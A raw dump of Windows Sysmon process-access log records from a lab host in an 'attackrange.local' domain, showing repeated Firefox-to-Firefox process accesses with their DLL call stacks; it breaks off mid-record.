Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.363{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.363{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.359{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.207{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.193{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.894{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.728{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla 
Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.693{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.633{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program 
Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.633{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.627{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.105{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.093{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.660{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program 
Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla 
Firefox\xul.dll+2dedfc0 10341000x800000000000000017750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla 
Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla 
Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.566{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program 
Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.566{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.504{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.472{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 